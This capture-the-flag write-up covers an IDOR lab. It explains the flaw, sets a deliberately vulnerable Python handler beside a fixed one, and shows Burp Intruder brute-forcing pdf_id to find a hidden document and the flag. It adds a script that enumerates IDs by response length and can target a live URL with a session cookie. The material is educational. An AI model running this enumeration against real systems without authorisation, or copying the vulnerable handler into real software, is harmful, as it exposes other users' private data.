Insecure Direct Object Reference (IDOR) write-up: vulnmachines lab
What is IDOR?
Insecure Direct Object Reference (IDOR) is an access control vulnerability that arises when an application uses user-supplied input (an id, filename or key) to look up an object directly, without checking that the requesting user is authorised for that particular object. An attacker bypasses authorisation simply by changing the value of the parameter that points to the object, for example by incrementing a numeric id, and the server hands back a resource that belongs to someone else.
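To make the definition concrete, here is an added example (not code from the lab or from vulnmachines) of a document-download handler in its IDOR-vulnerable form next to a hardened version. The in-memory store, the user names and the pdf ids are constructed for the illustration; the only assumption is that the application already knows who the authenticated user is.

```python
"""Vulnerable vs. hardened object lookup (added illustration, not lab code).

The store, user names and PDF ids below are constructed for the example.
"""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Pdf:
    pdf_id: int
    owner: str
    content: bytes


# Constructed sample data: three documents owned by two different users.
PDFS: Dict[int, Pdf] = {
    1248: Pdf(1248, "alice", b"alice's invoice"),
    2000: Pdf(2000, "alice", b"alice's report"),
    69: Pdf(69, "bob", b"bob's secret"),
}


def download_pdf_vulnerable(current_user: str, pdf_id: int) -> Optional[bytes]:
    """IDOR: the id taken from the request selects the object and nothing
    checks that current_user owns it, so any user can walk pdf_id=1..N."""
    pdf = PDFS.get(pdf_id)
    return pdf.content if pdf else None


def download_pdf_fixed(current_user: str, pdf_id: int) -> Optional[bytes]:
    """Hardened: the lookup is scoped to the authenticated user.

    A foreign id is treated exactly like a missing one, so the response does
    not reveal whether the object exists. That removes the response-length
    oracle an attacker would otherwise use to spot valid ids.
    """
    pdf = PDFS.get(pdf_id)
    if pdf is None or pdf.owner != current_user:
        return None
    return pdf.content


if __name__ == "__main__":
    # alice reading bob's document: succeeds on the vulnerable path only.
    print(download_pdf_vulnerable("alice", 69))
    print(download_pdf_fixed("alice", 69))
```

The important design choice is in `download_pdf_fixed`: the ownership check happens on every lookup, server side, against the session identity rather than against anything the client sent, and the "not yours" and "does not exist" cases produce the same result.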
Question:
Capture the flag by leveraging the IDOR vulnerability.
Solution:
Step 1: Visit vulnmachines.com
Step 2: Go to Mission -> Game -> Mission. Select ‘Insecure Direct Object References’.
Step 3: Click on Lab Access.
Step 4: You will be redirected to the lab page. The only user-controlled input on it is the Download PDF field, which is the vulnerable parameter.
Vulnerable parameter: Download PDF
As a first try we entered '2000' in the Download PDF field.
Step 5: Enter 1248 in the Download PDF field and capture the resulting request in Burp Suite (Proxy, intercept on).
Step 6: The captured request carries the value in a 'pdf_id' parameter; that parameter is the one vulnerable to IDOR. Send the request to Intruder and mark 'pdf_id' as the payload position for a brute-force attack.
In Intruder, set the payload type to Numbers with a range of 1 to 1500, then click Start attack.
In the results, the response for payload 69 has length 1317, which stands out from the other responses (sorting the results by the Length column makes the outlier easy to see). A document therefore exists at id 69: download PDF number 69 and read the flag from it.
Flag: vnm{“Congratulations!! Y0U H4VE FOUND ID0R}
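The Intruder step above can also be scripted. The following is an added example (not part of the original write-up) that enumerates pdf_id values and flags any id whose response length differs from the most common length, which is the same signal the write-up reads off Burp's Length column. The endpoint path, the parameter name in the request and the fake responses are assumptions: `fake_fetch` stands in for the lab server so the script runs offline, and `live_fetch` shows how the same logic would be pointed at a real target with a session cookie.

```python
"""Scripted version of the Intruder brute force (added example, not lab
code).  fake_fetch and its responses are constructed; the query parameter
name pdf_id comes from the write-up, the URL path is an assumption."""
import urllib.request
from collections import Counter
from typing import Callable, Dict, Iterable, List

# Constructed stand-in for the lab server: every pdf_id returns the same
# "not found" page except one, which returns a real document.
_NOT_FOUND = b"<html><body>No such document</body></html>"
_FOUND = {69: b"%PDF-1.4\n" + b"x" * 1300}


def fake_fetch(pdf_id: int) -> bytes:
    """Pretend to GET <base_url>?pdf_id=<n> against the constructed server."""
    return _FOUND.get(pdf_id, _NOT_FOUND)


def live_fetch(pdf_id: int, base_url: str, cookie: str) -> bytes:
    """Real request for use against a lab you are authorised to test (not
    run here).  base_url and the Cookie header are supplied by the caller."""
    req = urllib.request.Request(f"{base_url}?pdf_id={pdf_id}",
                                 headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def response_lengths(fetch: Callable[[int], bytes],
                     ids: Iterable[int]) -> Dict[int, int]:
    """Fetch every id once and record the body length, like Intruder does."""
    return {i: len(fetch(i)) for i in ids}


def find_outliers(lengths: Dict[int, int]) -> List[int]:
    """Return ids whose response length differs from the most common one.

    The most common length is the 'not found' baseline; anything else is a
    candidate object worth downloading by hand.
    """
    baseline, _ = Counter(lengths.values()).most_common(1)[0]
    return sorted(i for i, n in lengths.items() if n != baseline)


def hunt(fetch: Callable[[int], bytes] = fake_fetch,
         id_range: Iterable[int] = range(1, 1501)) -> List[int]:
    """Enumerate id_range through fetch and return the outlier ids."""
    return find_outliers(response_lengths(fetch, id_range))


if __name__ == "__main__":
    for pdf_id in hunt():
        print(f"pdf_id={pdf_id} length={len(fake_fetch(pdf_id))}")
```

Against a real target, add a small delay between requests and keep the id range tight; the length heuristic also breaks if the server pads error pages to a fixed size or returns per-request nonces, in which case compare status codes or content type instead.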
References:
https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/
https://secops.group/blog/exploiting-idors-a-compilation-of-some-neat-new-and-crazy-examples